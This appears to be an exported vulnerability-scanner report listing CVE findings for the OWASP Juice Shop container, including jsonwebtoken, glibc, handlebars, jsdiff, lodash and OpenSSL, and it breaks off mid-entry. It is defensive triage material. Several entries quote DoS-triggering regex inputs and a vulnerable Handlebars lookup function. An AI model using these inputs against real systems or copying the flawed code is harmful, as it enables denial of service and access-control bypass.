https://www.developsec.com/2017/11/09/xss-in-a-script-tag/
+https://github.com/juice-shop/juice-shop/blob/1ceb8751e986dacd3214a618c37e7411be6bc11a/routes/videoHandler.ts#L68

+ + + + + + + +
+
+
+
+ Finding 113: CVE-2022-23540 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

+ + +
Description
+

jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

In versions <=8.5.1 of jsonwebtoken library, lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification. Users are affected if you do not specify algorithms in the jwt.verify() + function. This issue has been fixed, please update to version 9.0.0 +which removes the default support for the none algorithm in the jwt.verify() method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the none algorithm. If you need 'none' algorithm, you have to explicitly specify that in jwt.verify() options.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23540
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6
+https://nvd.nist.gov/vuln/detail/CVE-2022-23540
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23540

+ + + + + + + +
+
+
+
+ Finding 114: CVE-2022-23541 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

jsonwebtoken is an implementation of JSON Web Tokens. Versions <= 8.5.1 of jsonwebtoken library can be misconfigured so that passing a poorly implemented key retrieval function referring to the secretOrPublicKey + argument from the readme link will result in incorrect verification of +tokens. There is a possibility of using a different algorithm and key +combination in verification, other than the one that was used to sign +the tokens. Specifically, tokens signed with an asymmetric public key +could be verified with a symmetric HS256 algorithm. This can lead to +successful validation of forged tokens. If your application is +supporting usage of both symmetric key and asymmetric key in +jwt.verify() implementation with the same key retrieval function. This +issue has been patched, please update to version 9.0.0.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23541
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959
+https://nvd.nist.gov/vuln/detail/CVE-2022-23541
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23541

+ + + + + + + +

Low

+ +
+
+
+
+ Finding 40: CVE-2010-4756 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 399 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + + +
Description
+

glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The glob implementation in the GNU C Library (aka glibc or libc6) +allows remote authenticated users to cause a denial of service (CPU and +memory consumption) via crafted glob expressions that do not match any +pathnames, as demonstrated by glob expressions in STAT commands to an +FTP daemon, a different vulnerability than CVE-2010-2632.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://cxib.net/stuff/glob-0day.c
+http://securityreason.com/achievement_securityalert/89
+http://securityreason.com/exploitalert/9223
+https://access.redhat.com/security/cve/CVE-2010-4756
+https://bugzilla.redhat.com/show_bug.cgi?id=681681
+https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756
+https://nvd.nist.gov/vuln/detail/CVE-2010-4756
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2010-4756

+ + + + + + + +
+
+
+
+ Finding 41: CVE-2018-20796 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

In the GNU C Library (aka glibc or libc6) through 2.29, +check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled +Recursion, as demonstrated by '(\227|)(\1\1|t1|\\2537)+' in grep.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/107160
+https://access.redhat.com/security/cve/CVE-2018-20796
+https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141
+https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html
+https://nvd.nist.gov/vuln/detail/CVE-2018-20796
+https://security.netapp.com/advisory/ntap-20190315-0002/
+https://support.f5.com/csp/article/K26346590?utm_source=f5support&amp%3Butm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2018-20796

+ + + + + + + +
+
+
+
+ Finding 42: CVE-2019-1010022 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 119 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: stack guard protection bypass
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may bypass stack guard protection. The component is: nptl. The +attack vector is: Exploit stack buffer overflow vulnerability and use +this bypass vulnerability to bypass stack guard. NOTE: Upstream comments + indicate "this is being treated as a non-security bug and no real +threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-1010022
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010022
+https://security-tracker.debian.org/tracker/CVE-2019-1010022
+https://sourceware.org/bugzilla/show_bug.cgi?id=22850
+https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3
+https://ubuntu.com/security/CVE-2019-1010022
+https://www.cve.org/CVERecord?id=CVE-2019-1010022

+ + + + + + + +
+
+
+
+ Finding 43: CVE-2019-1010023 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: running ldd on malicious ELF leads to code execution because of wrong size computation
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Re-mapping current loaded library +with malicious ELF file. The impact is: In worst case attacker may +evaluate privileges. The component is: libld. The attack vector is: +Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd +execute code. NOTE: Upstream comments indicate "this is being treated as + a non-security bug and no real threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/109167
+https://access.redhat.com/security/cve/CVE-2019-1010023
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010023
+https://security-tracker.debian.org/tracker/CVE-2019-1010023
+https://sourceware.org/bugzilla/show_bug.cgi?id=22851
+https://support.f5.com/csp/article/K11932200?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010023
+https://www.cve.org/CVERecord?id=CVE-2019-1010023

+ + + + + + + +
+
+
+
+ Finding 44: CVE-2019-1010024 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 200 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: ASLR bypass using cache of thread stack and heap
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may bypass ASLR using cache of thread stack and heap. The +component is: glibc. NOTE: Upstream comments indicate "this is being +treated as a non-security bug and no real threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/109162
+https://access.redhat.com/security/cve/CVE-2019-1010024
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010024
+https://security-tracker.debian.org/tracker/CVE-2019-1010024
+https://sourceware.org/bugzilla/show_bug.cgi?id=22852
+https://support.f5.com/csp/article/K06046097
+https://support.f5.com/csp/article/K06046097?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010024
+https://www.cve.org/CVERecord?id=CVE-2019-1010024

+ + + + + + + +
+
+
+
+ Finding 45: CVE-2019-1010025 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 330 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: information disclosure of heap addresses of pthread_created thread
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may guess the heap addresses of pthread_created thread. The +component is: glibc. NOTE: the vendor's position is "ASLR bypass itself +is not a vulnerability.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-1010025
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010025
+https://security-tracker.debian.org/tracker/CVE-2019-1010025
+https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+https://support.f5.com/csp/article/K06046097
+https://support.f5.com/csp/article/K06046097?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010025
+https://www.cve.org/CVERecord?id=CVE-2019-1010025

+ + + + + + + +
+
+
+
+ Finding 46: CVE-2019-9192 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

In the GNU C Library (aka glibc or libc6) through 2.29, +check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled +Recursion, as demonstrated by '(|)(\1\1)*' in grep, a different issue +than CVE-2018-20796. NOTE: the software maintainer disputes that this is + a vulnerability because the behavior occurs only with a crafted pattern

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-9192
+https://nvd.nist.gov/vuln/detail/CVE-2019-9192
+https://sourceware.org/bugzilla/show_bug.cgi?id=24269
+https://support.f5.com/csp/article/K26346590?utm_source=f5support&amp%3Butm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2019-9192

+ + + + + + + +
+
+
+
+ Finding 47: CVE-2022-27943 Libgcc-S1 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libgcc-s112.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 48: CVE-2022-27943 Libgomp1 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libgomp112.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 100: GHSA-442j-39wm-28r2 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

Handlebars.js has a Property Access Validation Bypass in container.lookup
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Summary

+

In lib/handlebars/runtime.js, the container.lookup() function uses container.lookupProperty() + as a gate check to enforce prototype-access controls, but then discards + the validated result and performs a second, unguarded property access (depths[i][name]). + This Time-of-Check Time-of-Use (TOCTOU) pattern means the security +check and the actual read are decoupled, and the raw access bypasses any + sanitization that lookupProperty may perform.

+

Only relevant when the compat compile option is enabled ({compat: true}), which activates depthedLookup in lib/handlebars/compiler/javascript-compiler.js.

+

Description

+

The vulnerable code in lib/handlebars/runtime.js (lines 137–144):

+
lookup: function (depths, name) {
+  const len = depths.length;
+  for (let i = 0; i < len; i++) {
+    let result = depths[i] && container.lookupProperty(depths[i], name);
+    if (result != null) {
+      return depths[i][name];  // BUG: should be `return result;`
+    }
+  }
+},
+
+ +

container.lookupProperty() (lines 119–136) enforces hasOwnProperty checks and resultIsAllowed() prototype-access controls. However, container.lookup() only uses lookupProperty as a boolean gate — if the gate passes (result != null), it then performs an independent, raw depths[i][name] access that circumvents any transformation or wrapped value that lookupProperty may have returned.

+

Workarounds

+
    +
  • Avoid enabling { compat: true } when rendering templates that include untrusted data.
  • +
  • Ensure context data objects are plain JSON (no Proxies, no getter-based accessor properties).
  • +
+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2

+ + + + + + + +
+
+
+
+ Finding 86: CVE-2026-24001 Diff 4.0.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
diff4.0.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/diff/package.json
+
+
+
+ + + + + +
Description
+

jsdiff: denial of service vulnerability in parsePatch and applyPatch
+Target: Node.js
+Type: node-pkg
+Fixed version: 8.0.3, 5.2.2, 4.0.4, 3.5.1

+

jsdiff is a JavaScript text differencing implementation. Prior to +versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch +whose filename headers contain the line break characters \r, \u2028, or \u2029 can cause the parsePatch + method to enter an infinite loop. It then consumes memory without limit + until the process crashes due to running out of memory. Applications +are therefore likely to be vulnerable to a denial-of-service attack if +they call parsePatch with a user-provided patch as input. A + large payload is not needed to trigger the vulnerability, so size +limits on user input do not provide any protection. Furthermore, some +applications may be vulnerable even when calling parsePatch + on a patch generated by the application itself if the user is +nonetheless able to control the filename headers (e.g. by directly +providing the filenames of the files to be diffed). The applyPatch + method is similarly affected if (and only if) called with a string +representation of a patch as an argument, since under the hood it parses + that string using parsePatch. Other methods of the library + are unaffected. Finally, a second and lesser interdependent bug - a +ReDOS - also exhibits when those same line break characters are present +in a patch's patch header (also known as its "leading garbage"). A maliciously-crafted patch header of length n can take parsePatch O(n³) + time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. +As a workaround, do not attempt to parse patches that contain any of +these characters: \r, \u2028, or \u2029.

+ + +
Mitigation
+

8.0.3, 5.2.2, 4.0.4, 3.5.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24001
+https://github.com/kpdecker/jsdiff
+https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5
+https://github.com/kpdecker/jsdiff/issues/653
+https://github.com/kpdecker/jsdiff/pull/649
+https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx
+https://nvd.nist.gov/vuln/detail/CVE-2026-24001
+https://www.cve.org/CVERecord?id=CVE-2026-24001

+ + + + + + + +
+
+
+
+ Finding 121: CVE-2018-3721 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 471 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

lodash: Prototype pollution in utilities function
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.17.5

+

lodash node module before 4.17.5 suffers from a Modification of +Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and + mergeWith functions, which allows a malicious user to modify the +prototype of "Object" via proto, causing the addition or modification of an existing property that will exist on all objects.

+ + +
Mitigation
+
+

=4.17.5

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2018-3721
+https://github.com/advisories/GHSA-fvqr-27wr-82fm
+https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml
+https://hackerone.com/reports/310443
+https://nvd.nist.gov/vuln/detail/CVE-2018-3721
+https://security.netapp.com/advisory/ntap-20190919-0004
+https://security.netapp.com/advisory/ntap-20190919-0004/
+https://snyk.io/vuln/npm:lodash:20180130
+https://www.cve.org/CVERecord?id=CVE-2018-3721
+https://www.npmjs.com/advisories/577

+ + + + + + + +
+
+
+
+ Finding 64: CVE-2025-27587 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 385 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + + +
Description
+

OpenSSL 3.0.0 through 3.3.2 on the PowerPC architecture is vulnerable ...
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

OpenSSL 3.0.0 through 3.3.2 on the PowerPC architecture is vulnerable + to a Minerva attack, exploitable by measuring the time of signing of +random messages using the EVP_DigestSign API, and then using the private + key to extract the K value (nonce) from the signatures. Next, based on +the bit size of the extracted nonce, one can compare the signing time of + full-sized nonces to signatures that used smaller nonces, via +statistical tests. There is a side-channel in the P-364 curve that +allows private key extraction (also, there is a dependency between the +bit size of K and the size of the side channel). NOTE: This CVE is +disputed because the OpenSSL security policy explicitly notes that any +side channels which require same physical system to be detected are +outside of the threat model for the software. The timing signal is so +small that it is infeasible to be detected without having the attacking +process running on the same physical system.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/openssl/openssl/issues/24253
+https://minerva.crocs.fi.muni.cz

+ + + + + + + +
+
+
+
+ Finding 65: CVE-2025-9232 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

+ + +
Description
+

openssl: Out-of-bounds read in HTTP client no_proxy handling
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.17-1~deb12u3

+

Issue summary: An application using the OpenSSL HTTP client API functions may
+trigger an out-of-bounds read if the 'no_proxy' environment variable is set and
+the host portion of the authority component of the HTTP URL is an IPv6 address.

+

Impact summary: An out-of-bounds read can trigger a crash which leads to
+Denial of Service for an application.

+

The OpenSSL HTTP client API functions can be used directly by applications
